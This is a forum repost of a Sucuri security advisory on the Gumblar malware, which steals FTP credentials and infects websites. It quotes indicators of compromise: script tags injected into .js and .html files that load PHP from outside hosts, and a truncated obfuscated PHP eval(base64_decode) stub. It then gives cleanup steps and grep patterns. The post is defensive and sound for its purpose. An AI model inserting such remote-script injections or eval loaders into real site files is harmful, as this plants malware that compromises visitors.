Jump to content
begood

Web site security - It starts with your desktop

By begood, in Stiri securitate

Recommended Posts

begood Newbie

begood

Posted
Posted

If you have a web site and you want it to be secure, the first place you have protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:

  1. Infects all .js files on your site with entries like this one:

    document.write('<script src=http://wap.northernplumbingandheating.com/assets/postinfo.php');

    document.write('<script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php');


  2. It infects every .html files with entries similar to this:

    <script src=http://wap.northernplumbingandheating.com/assets/postinfo.php

    <script src=http://shopping-dubai.com/images/runActiveContent.php >

    <script src=http://stb-umhau.de/images/muffin35.php >

    <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php


  3. Every PHP file with a code similar to this one:

    <?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF..


  4. And also creates backdoor files called gifimg.php on multiple directories

Note that the domain changes every time and this is just a small list of them:

How to clean my desktop if I have this virus?

  1. Install an anti-virus and make sure it detected and removed the problem. If it didn't, try a different one :)
  2. Change your FTP passwords.
  3. Start using SFTP instead of FTP
  4. Do not store your FTP/SFTP password on your desktop

How to clean my site if it is infected?

You can hire us to clean it up for you and monitor your sites going forward:

Sucuri Security

Or if you prefer to do yourself:

  1. Scan your site to see where the malware is and how it is called on your site
  2. Download your whole site to your desktop
  3. Use grep (or wingrep) and search for src=http, eval(base64_decode("aW
  4. Remove all those entries as well as the gifimg.php backdoors
  5. Re-upload your site back

That should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely.

Sucuri Security: Web site security - It starts with your desktop

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...